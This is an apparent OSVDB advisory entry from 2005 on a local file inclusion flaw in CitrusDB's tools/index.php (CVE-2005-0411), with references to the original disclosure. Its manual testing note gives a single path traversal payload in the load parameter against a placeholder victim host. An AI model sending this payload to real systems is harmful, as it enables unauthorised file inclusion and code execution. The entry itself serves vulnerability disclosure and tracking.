CitrusDB index.php load Parameter Traversal Arbitrary Local File Inclusion

2005-02-13T12:55:52
ID OSVDB:13786
Type osvdb
Reporter RedTeam Pentesting
Modified 2005-02-13T12:55:52

Description

Manual Testing Notes

http://[victim]/citrusdb/tools/index.php?load=../../../../../../tmp/exploit

References:

Vendor URL: http://www.citrusdb.org/
Other Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2005-005.txt
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0269.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0230.html
CVE-2005-0411